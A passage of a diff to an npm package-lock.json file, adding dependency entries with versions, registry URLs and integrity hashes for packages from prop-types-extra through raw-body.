"node_modules/prop-types-extra": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/prop-types-extra/-/prop-types-extra-1.1.1.tgz", + "integrity": "sha512-59+AHNnHYCdiC+vMwY52WmvP5dM3QLeoumYuEyceQDi9aEhtwN9zIQ2ZNo25sMyXnbh32h+P1ezDsUpUH3JAew==", + "dev": true, + "dependencies": { + "react-is": "^16.3.2", + "warning": "^4.0.0" + }, + "peerDependencies": { + "react": ">=0.14.0" + } + }, + "node_modules/prop-types-extra/node_modules/react-is": { + "version": "16.13.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==", + "dev": true + }, + "node_modules/prop-types-extra/node_modules/warning": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/warning/-/warning-4.0.3.tgz", + "integrity": "sha512-rpJyN222KWIvHJ/F53XSZv0Zl/accqHR8et1kpaMTD/fLCRxtV8iX8czMzY7sVZupTI3zcUTg8eycS2kNF9l6w==", + "dev": true, + "dependencies": { + "loose-envify": "^1.0.0" + } + }, + "node_modules/prop-types/node_modules/react-is": { + "version": "16.13.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-16.13.1.tgz", + "integrity": "sha512-24e6ynE2H+OKt4kqsOvNd8kBpV65zoxbA4BVsEOB3ARVWQki/DHzaUoC5KuON/BiccDaCCTZBuOcfZs70kR8bQ==" + }, + "node_modules/propagate": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/propagate/-/propagate-2.0.1.tgz", + "integrity": "sha512-vGrhOavPSTz4QVNuBNdcNXePNdNMaO1xj9yBeH1ScQPjk/rhg9sSlCXPhMkFuaNNW/syTvYqsnbIJxMBfRbbag==", + "dev": true, + "engines": { + "node": ">= 8" + } + }, + "node_modules/property-expr": { + "version": "2.0.5", + "resolved": "https://registry.npmjs.org/property-expr/-/property-expr-2.0.5.tgz", + "integrity": "sha512-IJUkICM5dP5znhCckHSv30Q4b5/JA5enCtkRHYaOVOAocnH/1BQEYTC5NMfT3AVl/iXKdr3aqQbQn9DxyWknwA==", + "dev": true + }, + "node_modules/proto-list": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz", + "integrity": "sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==", + "dev": true + }, + "node_modules/proto3-json-serializer": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-1.1.1.tgz", + "integrity": "sha512-AwAuY4g9nxx0u52DnSMkqqgyLHaW/XaPLtaAo3y/ZCfeaQB/g4YDH4kb8Wc/mWzWvu0YjOznVnfn373MVZZrgw==", + "dependencies": { + "protobufjs": "^7.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/protobufjs": { + "version": "7.2.5", + "resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.2.5.tgz", + "integrity": "sha512-gGXRSXvxQ7UiPgfw8gevrfRWcTlSbOFg+p/N+JVJEK5VhueL2miT6qTymqAmjr1Q5WbOCyJbyrk6JfWKwlFn6A==", + "hasInstallScript": true, + "dependencies": { + "@protobufjs/aspromise": "^1.1.2", + "@protobufjs/base64": "^1.1.2", + "@protobufjs/codegen": "^2.0.4", + "@protobufjs/eventemitter": "^1.1.0", + "@protobufjs/fetch": "^1.1.0", + "@protobufjs/float": "^1.0.2", + "@protobufjs/inquire": "^1.1.0", + "@protobufjs/path": "^1.1.2", + "@protobufjs/pool": "^1.1.0", + "@protobufjs/utf8": "^1.1.0", + "@types/node": ">=13.7.0", + "long": "^5.0.0" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/protobufjs-cli": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/protobufjs-cli/-/protobufjs-cli-1.1.1.tgz", + "integrity": "sha512-VPWMgIcRNyQwWUv8OLPyGQ/0lQY/QTQAVN5fh+XzfDwsVw1FZ2L3DM/bcBf8WPiRz2tNpaov9lPZfNcmNo6LXA==", + "dependencies": { + "chalk": "^4.0.0", + 
"escodegen": "^1.13.0", + "espree": "^9.0.0", + "estraverse": "^5.1.0", + "glob": "^8.0.0", + "jsdoc": "^4.0.0", + "minimist": "^1.2.0", + "semver": "^7.1.2", + "tmp": "^0.2.1", + "uglify-js": "^3.7.7" + }, + "bin": { + "pbjs": "bin/pbjs", + "pbts": "bin/pbts" + }, + "engines": { + "node": ">=12.0.0" + }, + "peerDependencies": { + "protobufjs": "^7.0.0" + } + }, + "node_modules/protobufjs-cli/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/protobufjs-cli/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/protobufjs-cli/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/protobufjs-cli/node_modules/escodegen": { + "version": "1.14.3", + "resolved": "https://registry.npmjs.org/escodegen/-/escodegen-1.14.3.tgz", + "integrity": "sha512-qFcX0XJkdg+PB3xjZZG/wKSuT1PnQWx57+TVSjIMmILd2yC/6ByYElPwJnslDsuWuSAp4AwJGumarAAmJch5Kw==", + "dependencies": { + "esprima": "^4.0.1", + "estraverse": "^4.2.0", + "esutils": "^2.0.2", + "optionator": "^0.8.1" + }, + "bin": { + "escodegen": "bin/escodegen.js", + "esgenerate": "bin/esgenerate.js" + }, + "engines": { + "node": ">=4.0" + }, + "optionalDependencies": { + "source-map": "~0.6.1" + } + }, + "node_modules/protobufjs-cli/node_modules/escodegen/node_modules/estraverse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", + "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/protobufjs-cli/node_modules/glob": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-8.1.0.tgz", + "integrity": "sha512-r8hpEjiQEYlF2QU0df3dS+nxxSIreXQS1qRhMJM0Q5NDdR386C7jb7Hwwod8Fgiuex+k0GFjgft18yvxm5XoCQ==", + "deprecated": "Glob versions prior to v9 are no longer supported", + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^5.0.1", + "once": "^1.3.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/protobufjs-cli/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/protobufjs-cli/node_modules/semver": { + "version": "7.6.2", + 
"resolved": "https://registry.npmjs.org/semver/-/semver-7.6.2.tgz", + "integrity": "sha512-FNAIBWCx9qcRhoHcgcJ0gvU7SN1lYU2ZXuSfl04bSC5OpvDHFyJCjdNHomPXxjQlCBU67YW64PzY7/VIEH7F2w==", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/protobufjs-cli/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/proxy-addr": { + "version": "2.0.7", + "resolved": "https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz", + "integrity": "sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==", + "dependencies": { + "forwarded": "0.2.0", + "ipaddr.js": "1.9.1" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/proxy-from-env": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.0.0.tgz", + "integrity": "sha1-M8UDmPcOp+uW0h97gXYwpVeRx+4=", + "dev": true + }, + "node_modules/prr": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/prr/-/prr-1.0.1.tgz", + "integrity": "sha1-0/wRS6BplaRexok/SEzrHXj19HY=", + "dev": true, + "optional": true + }, + "node_modules/pseudomap": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/pseudomap/-/pseudomap-1.0.2.tgz", + "integrity": "sha1-8FKijacOYYkX7wqKw0wa5aaChrM=" + }, + "node_modules/psl": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", + "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" + }, + "node_modules/pstree.remy": { + "version": "1.1.8", + "resolved": "https://registry.npmjs.org/pstree.remy/-/pstree.remy-1.1.8.tgz", + "integrity": "sha512-77DZwxQmxKnu3aR542U+X8FypNzbfJ+C5XQDk3uWjWxn6151aIMGthWYRXTqT1E5oJvg+ljaa2OJi+VfvCOQ8w==", + "dev": true + }, + "node_modules/pug": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pug/-/pug-3.0.3.tgz", + "integrity": "sha512-uBi6kmc9f3SZ3PXxqcHiUZLmIXgfgWooKWXcwSGwQd2Zi5Rb0bT14+8CJjJgI8AB+nndLaNgHGrcc6bPIB665g==", + "dependencies": { + "pug-code-gen": "^3.0.3", + "pug-filters": "^4.0.0", + "pug-lexer": "^5.0.1", + "pug-linker": "^4.0.0", + "pug-load": "^3.0.0", + "pug-parser": "^6.0.0", + "pug-runtime": "^3.0.1", + "pug-strip-comments": "^2.0.0" + } + }, + "node_modules/pug-attrs": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pug-attrs/-/pug-attrs-3.0.0.tgz", + "integrity": "sha512-azINV9dUtzPMFQktvTXciNAfAuVh/L/JCl0vtPCwvOA21uZrC08K/UnmrL+SXGEVc1FwzjW62+xw5S/uaLj6cA==", + "dependencies": { + "constantinople": "^4.0.1", + "js-stringify": "^1.0.2", + "pug-runtime": "^3.0.0" + } + }, + "node_modules/pug-code-gen": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pug-code-gen/-/pug-code-gen-3.0.3.tgz", + "integrity": "sha512-cYQg0JW0w32Ux+XTeZnBEeuWrAY7/HNE6TWnhiHGnnRYlCgyAUPoyh9KzCMa9WhcJlJ1AtQqpEYHc+vbCzA+Aw==", + "dependencies": { + "constantinople": "^4.0.1", + "doctypes": "^1.1.0", + "js-stringify": "^1.0.2", + "pug-attrs": "^3.0.0", + "pug-error": "^2.1.0", + "pug-runtime": "^3.0.1", + "void-elements": "^3.1.0", + "with": "^7.0.0" + } + }, + "node_modules/pug-error": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/pug-error/-/pug-error-2.1.0.tgz", + "integrity": 
"sha512-lv7sU9e5Jk8IeUheHata6/UThZ7RK2jnaaNztxfPYUY+VxZyk/ePVaNZ/vwmH8WqGvDz3LrNYt/+gA55NDg6Pg==" + }, + "node_modules/pug-filters": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/pug-filters/-/pug-filters-4.0.0.tgz", + "integrity": "sha512-yeNFtq5Yxmfz0f9z2rMXGw/8/4i1cCFecw/Q7+D0V2DdtII5UvqE12VaZ2AY7ri6o5RNXiweGH79OCq+2RQU4A==", + "dependencies": { + "constantinople": "^4.0.1", + "jstransformer": "1.0.0", + "pug-error": "^2.0.0", + "pug-walk": "^2.0.0", + "resolve": "^1.15.1" + } + }, + "node_modules/pug-lexer": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/pug-lexer/-/pug-lexer-5.0.1.tgz", + "integrity": "sha512-0I6C62+keXlZPZkOJeVam9aBLVP2EnbeDw3An+k0/QlqdwH6rv8284nko14Na7c0TtqtogfWXcRoFE4O4Ff20w==", + "dependencies": { + "character-parser": "^2.2.0", + "is-expression": "^4.0.0", + "pug-error": "^2.0.0" + } + }, + "node_modules/pug-linker": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/pug-linker/-/pug-linker-4.0.0.tgz", + "integrity": "sha512-gjD1yzp0yxbQqnzBAdlhbgoJL5qIFJw78juN1NpTLt/mfPJ5VgC4BvkoD3G23qKzJtIIXBbcCt6FioLSFLOHdw==", + "dependencies": { + "pug-error": "^2.0.0", + "pug-walk": "^2.0.0" + } + }, + "node_modules/pug-load": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pug-load/-/pug-load-3.0.0.tgz", + "integrity": "sha512-OCjTEnhLWZBvS4zni/WUMjH2YSUosnsmjGBB1An7CsKQarYSWQ0GCVyd4eQPMFJqZ8w9xgs01QdiZXKVjk92EQ==", + "dependencies": { + "object-assign": "^4.1.1", + "pug-walk": "^2.0.0" + } + }, + "node_modules/pug-parser": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/pug-parser/-/pug-parser-6.0.0.tgz", + "integrity": "sha512-ukiYM/9cH6Cml+AOl5kETtM9NR3WulyVP2y4HOU45DyMim1IeP/OOiyEWRr6qk5I5klpsBnbuHpwKmTx6WURnw==", + "dependencies": { + "pug-error": "^2.0.0", + "token-stream": "1.0.0" + } + }, + "node_modules/pug-runtime": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/pug-runtime/-/pug-runtime-3.0.1.tgz", + "integrity": "sha512-L50zbvrQ35TkpHwv0G6aLSuueDRwc/97XdY8kL3tOT0FmhgG7UypU3VztfV/LATAvmUfYi4wNxSajhSAeNN+Kg==" + }, + "node_modules/pug-strip-comments": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/pug-strip-comments/-/pug-strip-comments-2.0.0.tgz", + "integrity": "sha512-zo8DsDpH7eTkPHCXFeAk1xZXJbyoTfdPlNR0bK7rpOMuhBYb0f5qUVCO1xlsitYd3w5FQTK7zpNVKb3rZoUrrQ==", + "dependencies": { + "pug-error": "^2.0.0" + } + }, + "node_modules/pug-walk": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/pug-walk/-/pug-walk-2.0.0.tgz", + "integrity": "sha512-yYELe9Q5q9IQhuvqsZNwA5hfPkMJ8u92bQLIMcsMxf/VADjNtEYptU+inlufAFYcWdHlwNfZOEnOOQrZrcyJCQ==" + }, + "node_modules/pump": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.0.tgz", + "integrity": "sha512-LwZy+p3SFs1Pytd/jYct4wpv49HiYCqd9Rlc5ZVdk0V+8Yzv6jR5Blk3TRmPL1ft69TxP0IMZGJ+WPFU2BFhww==", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/pumpify": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/pumpify/-/pumpify-2.0.1.tgz", + "integrity": "sha512-m7KOje7jZxrmutanlkS1daj1dS6z6BgslzOXmcSEpIlCxM3VJH7lG5QLeck/6hgF6F4crFf01UtQmNsJfweTAw==", + "dependencies": { + "duplexify": "^4.1.1", + "inherits": "^2.0.3", + "pump": "^3.0.0" + } + }, + "node_modules/pumpify/node_modules/duplexify": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/duplexify/-/duplexify-4.1.2.tgz", + "integrity": "sha512-fz3OjcNCHmRP12MJoZMPglx8m4rrFP8rovnk4vT8Fs+aonZoCwGg10dSsQsfP/E62eZcPTMSMP6686fu9Qlqtw==", + 
"dependencies": { + "end-of-stream": "^1.4.1", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1", + "stream-shift": "^1.0.0" + } + }, + "node_modules/punycode": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", + "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", + "engines": { + "node": ">=6" + } + }, + "node_modules/punycode.js": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/punycode.js/-/punycode.js-2.3.1.tgz", + "integrity": "sha512-uxFIHU0YlHYhDQtV4R9J6a52SLx28BCjT+4ieh7IGbgwVJWO+km431c4yRlREUAsAmt/uMjQUyQHNEPf0M39CA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/qrcode": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/qrcode/-/qrcode-1.5.0.tgz", + "integrity": "sha512-9MgRpgVc+/+47dFvQeD6U2s0Z92EsKzcHogtum4QB+UNd025WOJSHvn/hjk9xmzj7Stj95CyUAs31mrjxliEsQ==", + "dev": true, + "dependencies": { + "dijkstrajs": "^1.0.1", + "encode-utf8": "^1.0.3", + "pngjs": "^5.0.0", + "yargs": "^15.3.1" + }, + "bin": { + "qrcode": "bin/qrcode" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/qrcode/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/qrcode/node_modules/camelcase": { + "version": "5.3.1", + "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", + "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/qrcode/node_modules/cliui": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-6.0.0.tgz", + "integrity": "sha512-t6wbgtoCXvAzst7QgXxJYqPt0usEfbgQdftEPbLL/cvv6HPE5VgvqCuAIDR0NgU52ds6rFwqrgakNLrHEjCbrQ==", + "dev": true, + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.0", + "wrap-ansi": "^6.2.0" + } + }, + "node_modules/qrcode/node_modules/find-up": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", + "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, + "dependencies": { + "locate-path": "^5.0.0", + "path-exists": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/locate-path": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", + "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "dev": true, + "dependencies": { + "p-locate": "^4.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/p-limit": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dev": true, + "dependencies": { + "p-try": "^2.0.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/qrcode/node_modules/p-locate": { + "version": 
"4.1.0", + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dev": true, + "dependencies": { + "p-limit": "^2.2.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/wrap-ansi": { + "version": "6.2.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", + "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/y18n": { + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/y18n/-/y18n-4.0.3.tgz", + "integrity": "sha512-JKhqTOwSrqNA1NY5lSztJ1GrBiUodLMmIZuLiDaMRJ+itFd+ABVE8XBjOvIWL+rSqNDC74LCSFmlb/U4UZ4hJQ==", + "dev": true + }, + "node_modules/qrcode/node_modules/yargs": { + "version": "15.4.1", + "resolved": "https://registry.npmjs.org/yargs/-/yargs-15.4.1.tgz", + "integrity": "sha512-aePbxDmcYW++PaqBsJ+HYUFwCdv4LVvdnhBy78E57PIor8/OVvhMrADFFEDh8DHDFRv/O9i3lPhsENjO7QX0+A==", + "dev": true, + "dependencies": { + "cliui": "^6.0.0", + "decamelize": "^1.2.0", + "find-up": "^4.1.0", + "get-caller-file": "^2.0.1", + "require-directory": "^2.1.1", + "require-main-filename": "^2.0.0", + "set-blocking": "^2.0.0", + "string-width": "^4.2.0", + "which-module": "^2.0.0", + "y18n": "^4.0.0", + "yargs-parser": "^18.1.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/qrcode/node_modules/yargs-parser": { + "version": "18.1.3", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-18.1.3.tgz", + "integrity": "sha512-o50j0JeToy/4K6OZcaQmW6lyXXKhq7csREXcDwk2omFPJEwUNOVtJKvmDr9EI1fAJZUyZcRF7kxGBWmRXudrCQ==", + "dev": true, + "dependencies": { + "camelcase": "^5.0.0", + "decamelize": "^1.2.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/qs": { + "version": "6.13.0", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.13.0.tgz", + "integrity": "sha512-+38qI9SOr8tfZ4QmJNplMUxqjbe7LKvvZgWdExBOmd+egZTtjLB67Gu0HRX3u/XOq7UU2Nx6nsjvS16Z9uwfpg==", + "dependencies": { + "side-channel": "^1.0.6" + }, + "engines": { + "node": ">=0.6" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/querystring": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/querystring/-/querystring-0.2.0.tgz", + "integrity": "sha1-sgmEkgO7Jd+CDadW50cAWHhSFiA=", + "deprecated": "The querystring API is considered Legacy. 
new code should use the URLSearchParams API instead.", + "engines": { + "node": ">=0.4.x" + } + }, + "node_modules/querystring-es3": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/querystring-es3/-/querystring-es3-0.2.1.tgz", + "integrity": "sha1-nsYfeQSYdXB9aUFFlv2Qek1xHnM=", + "dev": true, + "engines": { + "node": ">=0.4.x" + } + }, + "node_modules/querystringify": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/querystringify/-/querystringify-2.2.0.tgz", + "integrity": "sha512-FIqgj2EUvTa7R50u0rGsyTftzjYmv/a3hO345bZNrqabNqjtgiDMgmo4mkUjd+nzU5oF3dClKqFIPUKybUyqoQ==" + }, + "node_modules/queue-microtask": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", + "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/quick-lru": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/quick-lru/-/quick-lru-1.1.0.tgz", + "integrity": "sha1-Q2CxfGETatOAeDl/8RQW4Ybc+7g=", + "engines": { + "node": ">=4" + } + }, + "node_modules/rambda": { + "version": "7.5.0", + "resolved": "https://registry.npmjs.org/rambda/-/rambda-7.5.0.tgz", + "integrity": "sha512-y/M9weqWAH4iopRd7EHDEQQvpFPHj1AA3oHozE9tfITHUtTR7Z9PSlIRRG2l1GuW7sefC1cXFfIcF+cgnShdBA==", + "dev": true + }, + "node_modules/random-bytes": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/random-bytes/-/random-bytes-1.0.0.tgz", + "integrity": "sha1-T2ih3Arli9P7lYSMMDJNt11kNgs=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/randombytes": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.0.3.tgz", + "integrity": "sha1-Z0yZdgkBw8QRJ3GjHlIdw0nMCew=" + }, + "node_modules/randomstring": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/randomstring/-/randomstring-1.2.2.tgz", + "integrity": "sha512-9FByiB8guWZLbE+akdQiWE3I1I6w7Vn5El4o4y7o5bWQ6DWPcEOp+aLG7Jezc8BVRKKpgJd2ppRX0jnKu1YCfg==", + "dependencies": { + "array-uniq": "1.0.2", + "randombytes": "2.0.3" + }, + "bin": { + "randomstring": "bin/randomstring" + }, + "engines": { + "node": "*" + } + }, + "node_modules/randomstring/node_modules/array-uniq": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/array-uniq/-/array-uniq-1.0.2.tgz", + "integrity": "sha1-X8w3OSB3VyPP1k1lxkvvU7+eum0=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/range-parser": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/range-parser/-/range-parser-1.2.1.tgz", + "integrity": "sha512-Hrgsx+orqoygnmhFbKaHE6c296J+HTAQXoxEF6gNupROmmGJRoyzfG3ccAveqCBrwr/2yxQ5BVd/GTl5agOwSg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/rate-limiter-flexible": { + "version": "2.4.1", + "resolved": "https://registry.npmjs.org/rate-limiter-flexible/-/rate-limiter-flexible-2.4.1.tgz", + "integrity": "sha512-dgH4T44TzKVO9CLArNto62hJOwlWJMLUjVVr/ii0uUzZXEXthDNr7/yefW5z/1vvHAfycc1tnuiYyNJ8CTRB3g==" + }, + "node_modules/raw-body": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/raw-body/-/raw-body-2.5.2.tgz", + "integrity": "sha512-8zGqypfENjCIqGhgXToC8aB2r7YrBX+AQAfIPs/Mlk+BtPTztOvTS01NRW/3Eh60J+a48lt8qsCzirQ6loCVfA==", + "dependencies": { + "bytes": "3.1.2", + "http-errors": 
